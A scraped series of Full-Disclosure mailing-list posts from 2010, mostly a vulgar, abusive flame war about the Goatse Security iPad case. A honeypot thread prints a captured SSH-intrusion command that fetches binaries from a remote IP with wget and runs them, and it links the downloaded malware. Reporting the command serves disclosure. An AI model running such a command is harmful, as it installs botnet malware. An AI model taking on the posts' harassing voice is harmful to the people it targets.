Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
Notice how weev fails to mention his drug charges, like always, and if he does he claims it's some kind of FBI setup like the FBI put LSD in his house plus crack cocaine but he was high as a kite at Toorcon on LSD claiming Firefox bugs for media attention. Did you know most oxycotin addicts smoke crack cocaine when they cannot get their pills? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
On Thu, Nov 18, 2010 at 04:20:48AM -0600, Andrew Auernheimer wrote: Clearly the only joke here is you, buddy. Actually, this whole thread started off somewhat amusing. It has now degenerated into an schoolyard pissing contest. Can the two of you, please, take this off-list so you stop polluting the mailboxes of the rest of us and stop wasting our time? Thanks :) -- Spring is nature's way of saying, Let's party! -- Robin Williams (1952-), American actor and comedian pgpJ6MNk8qKUV.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day McSploit - McDonalds Dollar Menu Exploit/Vulnerability Released
All, I thought this might be of interest. There is a recent 0day vulnerability in the McDonalds dollar menu, namely that it is going to be going away in 2011. More info available at: http://www.savethedollarmenu.com/ ~~0day ReLeAsE BrOuGhT tO YoU bY DoLlAr MeNu 1337 Kr3w~~ Gr33tz 2 EvEry1 fRoM PP4L anD #fastfood Best Regards, Ummar AlMaymunah Food Efficiency Security Research ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
Are we done?? The pair of you?? Yes?? Good, move on On 18/11/10 11:19, huj huj huj wrote: the pot calling the kettle black? lol you are becoming increasingly delusional maybe you should go back to eating out hepkitten its no wonder your parents gave up on you.. 2010/11/18 Andrew Auernheimer glutt...@gmail.com mailto:glutt...@gmail.com You're getting really incoherent. Do you need some ESL classes? Perhaps you should contact one of those commercial services that write college papers for lazy students to draft your FD troll posts. On Thu, Nov 18, 2010 at 5:12 AM, huj huj huj datski...@gmail.com mailto:datski...@gmail.com wrote: i didnt get the info from hepkitten? i dont see where you got that fact from what i said was that hepkitten ousted you from bantown maybe if you learned how to read your life would be easier.. white hat security researcher my ass is phishing myspace and livejournal accounts through lame memes whitehat? i doubt it.. get a grip and pull that dildo out of your ass you retard 2010/11/18 Andrew Auernheimer glutt...@gmail.com mailto:glutt...@gmail.com I have never denied the extensive production of politically motivated art I have produced, including the iProphet. I will continue making such compelling art to evoke emotion in my audiences. Regardless, the empirical evidence points to me being: * An anti-organized crime and anti-child pornography activist, a practice which I have been engaging in for years upon years. I have extensive evidence of merit to back this up and can say it under penalty of perjury. * A consumer rights advocate and white hat security researcher, something I have been cited by other respected researchers and won awards for public service for: http://techcrunch.com/2010/06/14/were-awarding-goatse-security-a-crunchie-award-for-public-service/ and your idea of a reliable source of information is... hepkitten? Clearly the only joke here is you, buddy. On Thu, Nov 18, 2010 at 4:03 AM, huj huj huj datski...@gmail.com mailto:datski...@gmail.com wrote: of course you didn't... and you also don't have a beard and post lame rants as the iprophet :) as for me eating fecal matter, you're just envious you are not fighting anything other than your anonymity and empty wallet stop pretending otherwise nobody believes your silly little lies and misconceptions anyway you and the rest of your losercrew can go suck a lemon you were never anything.. hell hepkitten ousted you lol loser 2010/11/18 Andrew Auernheimer glutt...@gmail.com mailto:glutt...@gmail.com I never made those statements. They seem particularly ridiculous and not even remotely in my rhetorical style. But for the sake of argument, I have IRC logs showing that you're a degenerate shit eater: 01:42 Hujhujhuj last night I got a train run on me in a sling at a pozzing party 01:42 Hujhujhuj i loved having an ass packed full of semen 01:42 Hujhujhuj after it was done 4 hairy bears shit on my chest 01:44 Hujhujhuj i packed the delicious feces into my mouth and i loved every single scrumptious bite 01:46 Hujhujhuj im going to get tested later today, i hope its poz, ive been trying for ages What do you have to say for yourself? On Thu, Nov 18, 2010 at 3:42 AM, huj huj huj datski...@gmail.com mailto:datski...@gmail.com wrote: ah sorry it was 8k owned macs you wanted to sell to the russians.. how very patriotic of you!! cunt :) 09:50 weev i gotta get some money 09:50 weev my cashflow sucks 09:51 weev whores 09:51 weev lavish cars 09:51 weev gigantic places to live 15:05 weev does anybody know these russians 15:06 weev that they are buying up hacked macs for 43 cents an install 15:26 weev i have access to like 15:26 weev 8k rooted macs 15:26 weev right now 15:26 weev and i would like to make a quick $3500 2010/11/18 huj huj huj datski...@gmail.com mailto:datski...@gmail.com yeah takes one to know one you have always been a nobody chasing fame with silly memes and smalltime trolling you keep talking about what others have done well i save starving children in africa i singlehandedly removed all german pedophiles from pattaya in 2009 i stopped the cold war between usa and cccp i could go on but i already copied your silly lies too much let me recap you have done absolutely nothing to help anyone but yourself you are a greedy
Re: [Full-disclosure] Open Letter to Lee Vartan,...
I must admit I may not know all the story of Andrew/weev or whoever he is. It does however seem that some of the claims made by Andrew is correct. A few of the ranters here could try using google perhaps? Or read on links already provided..? He is indeed mentioned online and he has indeed made important contribution regarding the Apple fiasco with the iPad. In any case, if weev is a troll etc etc he seem not to be the only one here. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
Hi, On Thu, 2010-11-18 at 01:06 +, Andrew Aurenheimer wrote: Troy, As with many of my critics, you insist on attempting to libel me and defame my character (clearly having an objection to my political views) instead of honestly debating the merits of my actions and the reality of my many well-received research contributions. I take ad hominem attacks like yours in stride with the civility and grace befitting of a Christian man, and urge you to think more critically before you say more things that will embarrass you in front of your peers. I am pretty sure that you are no Christian, that's for damn sure. But hey, neither am I. However, I also don't pretend to be one in order to get sympathy from the courts. Oh right, I'm also not herding botnets and gloating about it on IRC while also exploiting ATT's web forms 183000 times and talking on IRC about how this will destroy ATT, so I guess I don't have to worry about the feds and/or bubba pounding my ass. On that topic, I suggest you look into some sort of dildo so that you can at least prepare yourself now for your cellmate named Bubba. The only evidence of legitimate security research that you have done was the XPS IRC flood attacks. Oh wait, you invented that so that you could be an asshole script kiddie and be extremely disruptive to people trying to do actual work on freenode and OFTC! Great work! Oh, by the way, it is not anything new, we thought of it a long time ago, which is why hybrid/ratbox/charybdis IRCds catch the POST message from unregistered users thus making your XPS IRC flooder worthless. Like a script kiddie, you scream that your XPS IRC flooder is truly innovative, when really, about 2 gazillion script kiddies have already thought this up. Seriously, nothing new. You see no evidence of Your implication that because you have not seen evidence of something it has not happened is fallacious. Regardless, I will enlighten you with some history of our anti-pedophile activity (with links to backdated posts pedophile posts detailing our successes against their infrastructure and payment systems, emails with full headers and evidence of ongoing pedophile activity), some of which predates the iPad incident by years. You haven't seen any evidence of it because we, unlike many people, do not wear every bit of public service we do on our sleeve. We live in the spirit of Matthew 6:6. Yes, taking action against a Harry Potter slash fanfiction author is really constructive work in getting rid of paedophiles on the Internet. That's the only thing *close* to any sort of claim you're making, and it's just typical script kiddie instigation. You act as if you are totally a Saint, when in reality, all you have done is violated the first amendment rights of a fanfiction author in the name of allegedly stopping paedophilia. By the way, I don't remember you trolling her because you thought she was a paedophile. I remember you trolling her because you thought her stories were really crappy. Other actions your group has taken include the intimidation and harrassment of DroneBL contributors, which happened under my oversight and has happened as well under Alexander Maassen's oversight. Yes, harrassing system operators who are contributing the IPs you troll from to a DNSBL is truly a white hat activity. You are truly an example to us all. You know, I find it funny that you live in the spirit of Matthew 6:6, so I looked that verse up. The New International Version says the verse is: But when you pray, go into your room, close the door and pray to your Father, who is unseen. Then your Father, who sees what is done in secret, will reward you. You do indeed appear to be being rewarded by God right now in the form of a FBI investigation. Do let us know how that goes for you. This is like a hostage situation, weev. The more you post, the more dead bodies you throw out for the FBI and everyone else to see. If I were you, I would shut up now. Infact, I would bet that almost any lawyer would tell you that you should shut up from day 1. William ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SSH scans, i caught one
Hi, I got tired of all ssh scans the past few months so I've set up a Kojoney honeypot to see what the hell they were trying. This is what they try: 2010/11/17 21:22 CET [SSHChannel session (0) on SSHService ssh-connection on SSHServerTransport,27,84.51.138.193] executing command cd /var/tmp;mkdir .scan;wgethttp://93.184.100.76:2700/pwn/syslgd;wget https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/syslgd;wget http://93.184.100.76:2700/pwn/ssh;chmod https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/ssh;chmod u+x syslgd ssh;./syslgd;rm syslgd So I downloaded all his files from the /pwn/ directory. The funny part is, most of them are MIPS files(?). Also there are a lot of IRC config-like files. For anyone who's interested, this is what they try/download the moment they can login. http://safu.stream-portal.org/pwnd.tgz Have a nice day, Marco van Berkum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
Please don't turn this mail list into something about religion. I couldn't care less about religion, and this is certainly not a religious mail list. I would be on a different list if that was something I cared about. 2010-11-18 20:46, Andrew Auernheimer skrev: Coderman, Everything I do is in service to Christ. I believe it is the opposite: if you truly believe in the life and actions of Christ and you follow his word in completeness, you will soon find yourself persecuted by the Pharisees that run the world. Following Christ and avoiding government sanction are utterly incompatible in this brave new world we live in. Who wants to bow to a lifeless, cold Jesus That all of the preachers have painted their way They hold their revivals, yet worship their idols Serve God in title but to mammon they slave. But the Jesus that I know stood up to rival And calls His disciples to come do the same. On Thu, Nov 18, 2010 at 1:10 PM, coderman coder...@gmail.com wrote: On Wed, Nov 17, 2010 at 11:16 PM, Andrew Auernheimer glutt...@gmail.com wrote: ... Inspired by a sermon I heard at a Mormon stake conference,... lol, wut? maybe if the word of wisdom inspired you more you wouldn't be under fed heaters. can't imagine this thread taking a more surreal, off-topic tangent, but surely weev will deliver! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Spambox Spam Quarantine Notification
What silly twat spams everybody's inbox with a spam email? Joe On Thu, Nov 18, 2010 at 7:48 PM, RandallM randa...@fidmail.com wrote: anyone seeing SPAMBOX used to report spam for gmail? ...a phish or what? -- Forwarded message -- From: SPAMBOX supp...@spambox.com.au Date: Thu, Nov 18, 2010 at 7:03 AM Subject: Spambox Spam Quarantine Notification To: fatherlap...@gmail.com Spambox Spam Quarantine Notification Dear fatherlap...@gmail.com, You currently have 1 message/messages in your quarantine and they will expire in 14 days. Quarantined Email From Subject Date Release Aliyu Mohammedmoham...@msn.com OFFICE OF THE NATIONAL SECURITY ADVISER TO THE PRESIDENT FED... 18 Nov 2010 View All Quarantined Messages(1) Note: This message has been sent by a notification only system. Please do not reply If the above links do not work, please copy and paste the following URL into a Web browser: http://quarantine.spambox.com.au:82/Search?h=c70f83242f0f873e96f89a03ab1530beemail=fatherlaptop%40gmail.com Regards, Spambox === Headers and such: Delivered-To: fatherlap...@gmail.com Received: by 10.213.27.140 with SMTP id i12cs43054ebc; Thu, 18 Nov 2010 05:03:50 -0800 (PST) Received: by 10.42.180.67 with SMTP id bt3mr104562icb.349.1290085428634; Thu, 18 Nov 2010 05:03:48 -0800 (PST) Return-Path: boun...@platformnetworks.net Received: from inbound.spambox.com.au (inbound.spambox.com.au [202.62.145.58]) by mx.google.com with ESMTP id u36si315871vbb.75.2010.11.18.05.03.46; Thu, 18 Nov 2010 05:03:48 -0800 (PST) Received-SPF: neutral (google.com: 202.62.145.58 is neither permitted nor denied by best guess record for domain of boun...@platformnetworks.net) client-ip=202.62.145.58; Authentication-Results: mx.google.com; spf=neutral (google.com: 202.62.145.58 is neither permitted nor denied by best guess record for domain of boun...@platformnetworks.net) smtp.mail=boun...@platformnetworks.net Received: from localhost by inbound.spambox.com.au; 19 Nov 2010 00:03:39 +1100 Content-Type: multipart/alternative; boundary2120642660== MIME-Version: 1.0 Message-Id: 09c4cc$b67db59=a105064353876...@ironport1.spambox.com.au From: =?utf-8?q?SPAMBOX?= supp...@spambox.com.au Sender: boun...@platformnetworks.net To: fatherlap...@gmail.com Date: 19 Nov 2010 00:03:39 +1100 Subject: Spambox Spam Quarantine Notification Spambox Spam Quarantine Notification --===2120642660== Content-Type: text/plain; charset=utf-8 MIME-Version: 1.0 Content-Transfer-Encoding: base64 CisrIE5vdGU6IFRoaXMgbWVzc2FnZSBoYXMgYmVlbiBzZW50IGJ5IGEgbm90aWZpY2F0aW9uIG9u bHkgc3lzdGVtLiBQbGVhc2UgZG8gbm90IHJlcGx5ICsrCgpTcGFtYm94IFNwYW0gUXVhcmFudGlu ZSBOb3RpZmljYXRpb24KCkRlYXIgZmF0aGVybGFwdG9wQGdtYWlsLmNvbSwKCllvdSBjdXJyZW50 bHkgaGF2ZSAxIG1lc3NhZ2UvbWVzc2FnZXMgaW4geW91ciBxdWFyYW50aW5lIGFuZCB0aGV5IHdp bGwgZXhwaXJlIGluIDE0IGRheXMuCgoKLS0tLS0tLS0tLS0gTmV3IFF1YXJhbnRpbmUgTWVzc2Fn ZXMgLS0tLS0tLS0tLS0tLS0tCgpNZXNzYWdlIDEKICAgRnJvbTogIkFsaXl1IE1vaGFtbWVkIjxN b2hhbW1lZEBtc24uY29tPgogICBTdWJqZWN0OiBPRkZJQ0UgT0YgVEhFIE5BVElPTkFMIFNFQ1VS SVRZIEFEVklTRVIgVE8gVEhFIFBSRVNJREVOVCBGRURFUkFMIFJFUFVCTElDIE9GIE5JR0VSSUEK ICAgRGF0ZTogMTggTm92IDIwMTAKICAgUmVsZWFzZTogaHR0cDovL3F1YXJhbnRpbmUuc3BhbWJv eC5jb20uYXU6ODIvTWVzc2FnZT9hY3Rpb249UmVsZWFzZSZtaWQ9NDY4MjQ3MyZoPTk5YWRlMmIz Y2VhMzEyYTJlZWVmMzE2YWIwOGJkYjliJmVtYWlsPWZhdGhlcmxhcHRvcCU0MGdtYWlsLmNvbQoK LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpUbyBt YW5hZ2UgeW91ciBxdWFyYW50aW5lIHBsZWFzZSB2aXNpdCB0aGUgVVJMIGJlbG93OgpodHRwOi8v cXVhcmFudGluZS5zcGFtYm94LmNvbS5hdTo4Mi9TZWFyY2g/aD1jNzBmODMyNDJmMGY4NzNlOTZm ODlhMDNhYjE1MzBiZSZlbWFpbD1mYXRoZXJsYXB0b3AlNDBnbWFpbC5jb20KCgpSZWdhcmRzLAoK U3BhbWJveA== --===2120642660== Content-Type: text/html; charset=utf-8 MIME-Version: 1.0 Content-Transfer-Encoding: base64 CjwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAxIFRyYW5zaXRpb25h bC8vRU4iCiAgImh0dHA6Ly93d3cudzMub3JnL1RSL2h0bWw0MC9sb29zZS5kdGQiPgo8aHRtbD4K PGhlYWQ+CiAgPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0 bWw7IGNoYXJzZXQ9VVRGLTgiPgogIDx0aXRsZT4KICAgIFNwYW1ib3ggU3BhbSBRdWFyYW50aW5l IE5vdGlmaWNhdGlvbgogIDwvdGl0bGU+CjwvaGVhZD4KCjxib2R5IHN0eWxlPSJjb2xvcjogIzAw MDAwMDsgZm9udC1mYW1pbHk6IHZlcmRhbmEsIGFyaWFsLCBzYW5zLXNlcmlmOyBmb250LXNpemU6 IDExcHg7Ij4KPHRhYmxlIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCIgYm9yZGVyPSIw IiB3aWR0aD0iMTAwJSI+CiAgPHRyPgogICAgPHRkIHZhbGlnbj0idG9wIj4KICAgICAgPGgxIGlk PSJwYWdlX3RpdGxlIiBzdHlsZT0iY29sb3I6ICM2MTYxMzI7IGZvbnQtZmFtaWx5OiB2ZXJkYW5h LCBhcmlhbCwgc2Fucy1zZXJpZjsgZm9udC1zaXplOiAxLjZlbTsgcGFkZGluZzogMHB4OyI+CiAg ICAgICAgU3BhbWJveCBTcGFtIFF1YXJhbnRpbmUgTm90aWZpY2F0aW9uCiAgICAgIDwvaDE+CiAg ICA8L3RkPgogIDwvdHI+CjwvdGFibGU+Cjxicj4KPGRpdiBpZD0iY29udGVudCI+CiAgRGVhciBm YXRoZXJsYXB0b3BAZ21haWwuY29tLDxicj4KPGJyPgpZb3UgY3VycmVudGx5IGhhdmUgMSBtZXNz
Re: [Full-disclosure] SSH scans, i caught one
Yeah thats what i thought too. Tho the ssh file is a dropbear according to strings. Grtz, Marco van Berkum On 11/19/2010 11:13 AM, Danijel wrote: Quick view at the files, it looks like a irc control for a botnet or something similar -- *blap* On Thu, Nov 18, 2010 at 13:13, Marco van Berkum ma...@obit.nl mailto:ma...@obit.nl wrote: Hi, I got tired of all ssh scans the past few months so I've set up a Kojoney honeypot to see what the hell they were trying. This is what they try: 2010/11/17 21:22 CET [SSHChannel session (0) on SSHService ssh-connection on SSHServerTransport,27,84.51.138.193] executing command cd /var/tmp;mkdir .scan;wgethttp://93.184.100.76:2700/pwn/syslgd;wget https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/syslgd;wget http://93.184.100.76:2700/pwn/ssh;chmod https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/ssh;chmod u+x syslgd ssh;./syslgd;rm syslgd So I downloaded all his files from the /pwn/ directory. The funny part is, most of them are MIPS files(?). Also there are a lot of IRC config-like files. For anyone who's interested, this is what they try/download the moment they can login. http://safu.stream-portal.org/pwnd.tgz Have a nice day, Marco van Berkum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
que? On 11/18/2010 04:46 PM, Andrew Auernheimer wrote: Coderman, Everything I do is in service to Christ. I believe it is the opposite: if you truly believe in the life and actions of Christ and you follow his word in completeness, you will soon find yourself persecuted by the Pharisees that run the world. Following Christ and avoiding government sanction are utterly incompatible in this brave new world we live in. Who wants to bow to a lifeless, cold Jesus That all of the preachers have painted their way They hold their revivals, yet worship their idols Serve God in title but to mammon they slave. But the Jesus that I know stood up to rival And calls His disciples to come do the same. On Thu, Nov 18, 2010 at 1:10 PM, coderman coder...@gmail.com wrote: On Wed, Nov 17, 2010 at 11:16 PM, Andrew Auernheimer glutt...@gmail.com wrote: ... Inspired by a sermon I heard at a Mormon stake conference,... lol, wut? maybe if the word of wisdom inspired you more you wouldn't be under fed heaters. can't imagine this thread taking a more surreal, off-topic tangent, but surely weev will deliver! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH scans, i caught one
Hi, So I downloaded all his files from the /pwn/ directory. The funny part is, most of them are MIPS files(?). interesting...going for a particular target/platform I'd suggest - like some small home routers...OpenWRT box type deviceswhy target the PC to get interesting information like passwords when you can exploit their little home router and listen in on everything with no AV software on the PC ever picking you up... alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH scans, i caught one
On 11/19/2010 12:34 PM, Alan Buxey wrote: Hi, So I downloaded all his files from the /pwn/ directory. The funny part is, most of them are MIPS files(?). interesting...going for a particular target/platform I'd suggest - like some small home routers...OpenWRT box type deviceswhy target the PC to get interesting information like passwords when you can exploit their little home router and listen in on everything with no AV software on the PC ever picking you up... alan I wonder if there are ARM versions around too, or are they only interested in MIPS systems? Grtz, Marco van Berkum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH scans, i caught one
On 11/19/2010 12:34 PM, Alan Buxey wrote: Hi, So I downloaded all his files from the /pwn/ directory. The funny part is, most of them are MIPS files(?). interesting...going for a particular target/platform I'd suggest - like some small home routers...OpenWRT box type deviceswhy target the PC to get interesting information like passwords when you can exploit their little home router and listen in on everything with no AV software on the PC ever picking you up... alan I wonder if there are ARM versions around too, or are they only interested in MIPS systems? Maybe it's a fork from this old botnet: http://dronebl.org/blog/8 ? I haven't seen much routers with ARM CPUs whereas the number of SOHO routers based on MIPS architecture seems to be high. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH scans, i caught one
On 11/19/2010 02:35 PM, Julien Reveret wrote: Maybe it's a fork from this old botnet: http://dronebl.org/blog/8 ? I haven't seen much routers with ARM CPUs whereas the number of SOHO routers based on MIPS architecture seems to be high. Interesting... From the first look of it this old botnet is way more advanced. At least the installprocess is. the only thing the 'hacker' tried to infect my Koyoney was: cd /var/tmp; mkdir .scan; wget http://93.184.100.76:2700/pwn/syslgd; wget http://93.184.100.76:2700/pwn/ssh;chmod u+x syslgd ssh;./syslgd; rm syslgd; Twice now btw, just had another ssh login from another IP that did the exact same thing. Grtz, Marco van Berkum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
On Thu, 18 Nov 2010 22:32:13 CST, Andrew Auernheimer said: for publicly and irrevocably demonstrating that you have a longstanding ax to grind with me, so the logs you announced on IRC that you altered in corroboration with two other parties now can no longer be used in court. If evidence was automatically inadmissible just because somebody had an ax to grind with the accused, it would be a lot harder to get a conviction. (Consider - much of the time, prosecution witnesses have an ax to grind with the accused. You shoot a man in front of his family, his family are going to be the prime witnesses, and they certainly have an ax to grind with you. That doesn't mean their testimony is inadmissible) Consider that *your* log of the conversation is automatically equally suspect, as *you* obviously have a reason to alter/edit it - so if they can't use their logs as evidence against you, then you should be equally unable to use your logs as exculpatory evidence. But of course, your logs and their logs are in fact admissible - and then your lawyers and the other side's lawyers each get to argue about which logs are in fact correct, and the jury gets to decide who to believe. Yes, he may have an ax to grind, but is it a big enough ax to perjure himself when he says under oath that the logs are accurate and not edited? Sorting out this sort of he said, he said is why we have juries. pgp1zY313mcFz.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Deadline extension: ICDT 2011 | The Sixth International Conference on Digital Telecommunications
INVITATION: = Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results. = == ICDT 2011 | Call for Papers === CALL FOR PAPERS, TUTORIALS, PANELS ICDT 2011: The Sixth International Conference on Digital Telecommunications April 17-22, 2011 - Budapest, Hungary General page: http://www.iaria.org/conferences2011/ICDT11.html Call for Papers: http://www.iaria.org/conferences2011/CfPICDT11.html Submission deadline: December 10, 2010 Technical co-sponsors: Cisco Systems, Inc. Alcatel-Lucent Nokia Siemens Networks Fraunhofer IGD ICTmc University Politehnica of Bucharest University of Erlangen-Nuremberg Sponsored by IARIA, www.iaria.org Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org Please note the Poster Forum and Work in Progress options. The topics suggested by the conference can be discussed in term of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels. Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html ICDT 2011 Topics (topics and submission details: see CfP on the site) SIGNAL: Signal processing in telecommunications Signal processing theory and practice; Image and multidimensional signal processing; Signal filter design and structures; Multirate filtering, filter banks, and adaptive filters; Fast signal processing algorithms; Nonlinear signals and systems; Nonuniform transformation; 2D nonuniform DFT; Fast algorithm of NDFT; Advanced image/video coding; Advanced prediction techniques; Signal detection and reconstruction; Spectral estimation and time-frequency analysis; Higher order spectrum analysis; Parameter estimation; Array signal processing; Statistical signal analysis; Signal and system modeling; Cyclostationary signal analysis; Active noise control, active noise reduction and echo cancellation; Psychoacoustics and room acoustics; Signal processing for music; Binaural systems and multidimensional signal systems; Geophysical and seismic signal processing; Nonlinear interpolation/resampling; Extensions to wavelet based coding (x-lets); Low complexity image/video compression; Multipl! e resolution signal processing; New approach to digital signal processing; Compression of random data; Recompression of compressed data; 2D projection of 3D data; Stereo data matching; Emerging applications requiring new compression tools; Unified compression and recognition; H.264 and latest video coding standards; Latest audio coding standards DATA: Data processing Data transmission and reception mechanisms and techniques; Enhanced tools for video data integrity; Data mining, filtering, and reporting; Secure data transmission; Transmission media and data encoding; Text reading devices (super-pen, pen-elite, reading-pen); Scanned and generated lossy (progressive) multi-page text; (Visually) lossless mechanisms; Pricing data transmission; Differential data transmission systems; Data transmission equipments and transmission rates; Delay-constrained data transmission; Undersea and satellite data transmission techniques; Performance evaluation of data transmission; Multicast data transmission; High speed data transmission; Data transmission control; Integrity and privacy in data transmission; Data transmission standards AUDIO: Audio transmission and reception systems Audio transmission and reception systems and devices; Digital audio transmission signal processing; Audio transmission over Internet; Audio Multiplexing Transmission Systems; Stereo audio transmission signal; Digital infrared audio transmission; Multi-stream and multi-path audio transmission; Wireless-compressed digital audio transmission; Perceptual coding for audio transmission and storage; Laser audio transmission; Synchronizing video and audio transmission; Wide-band audio transmission; Index-frame audio transmission; Digital audio transmission rights; Noise in wireless audio transmission; Audio tools and products; Standards VOICE: Voice over packet networks Planning and implementing voice networks and systems; Voice transmission systems; Voice transmission performance; Quality real-time voice transmission; Metrics for quality of voice transmission; Stereophonic voice transmission systems; Header Compression for VoIP over WLAN; Voice over IP solution for mobile
Re: [Full-disclosure] Open Letter to Lee Vartan,...
Hi, It's no Apple fault, but ATT software QA. I have did software review for one of applications for other major Telko and they has used Device ID as login identifier for one of their POC apps. So this mistake is common. Alternative approach for identification and prefiling inputs was suggested by is usage of iOS property lists. You can take a read a few here: http://developer.apple.com/library/ios/documentation/Cocoa/Conceptual/PropertyLists/QuickStartPlist/QuickStartPlist.html#//apple_ref/doc/uid/1048i-CH4-SW7 Summary: this mean it's not an Apple fault, but ATT developer or contractor who has coded app with auto-filling based on SIM ID. -- Andriy G. Tereshchenko Odessa, Ukraine On Thu, Nov 18, 2010 at 1:16 PM, petrzelkai petrzel...@isometrus.sytes.net wrote: He is indeed mentioned online and he has indeed made important contribution regarding the Apple fiasco with the iPad. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cve-2010-4091 exploited ?
Hi to all, Seems that with a crafted PDF, a bit different from xpl.pdf, the code flow may be hijacked somewhere. As reported it's only an attempt to understand a bit more about this issue.So mistakes are very likely. If you are interested try to check: http://extraexploit.blogspot.com/2010/11/cve-2010-4091-exploited.html Feedback are welcome. -- http://extraexploit.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CALL FOR PAPERS, TUTORIALS, PANELS: Advances in Network and Communications
INVITATION: = Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results. = == CTRQ 2011 | Call for Papers === CALL FOR PAPERS, TUTORIALS, PANELS CTRQ 2011: The Fourth International Conference on Communication Theory, Reliability, and Quality of Service April 17-22, 2011 - Budapest, Hungary General page: http://www.iaria.org/conferences2011/CTRQ11.html Call for Papers: http://www.iaria.org/conferences2011/CfPCTRQ11.html Submission deadline: December 10, 2010 Technical co-sponsors: University of Maryland University of Plymouth Washington University in St. Louis Politehnica University of Bucharest University of Beira Interior, Portugal Telcordia Tehnologies Inc. Instituto de Telecomunicações TECNALIA RESEARCH INNOVATION Huawei Technologies, China Sponsored by IARIA, www.iaria.org Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org Please note the Poster Forum and Work in Progress options. The topics suggested by the conference can be discussed in term of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels. Before submission, please check and conform with the Editorial rules: http://www.iaria.org/editorialrules.html CTRQ 2011 Topics (topics and submission details: see CfP on the site) 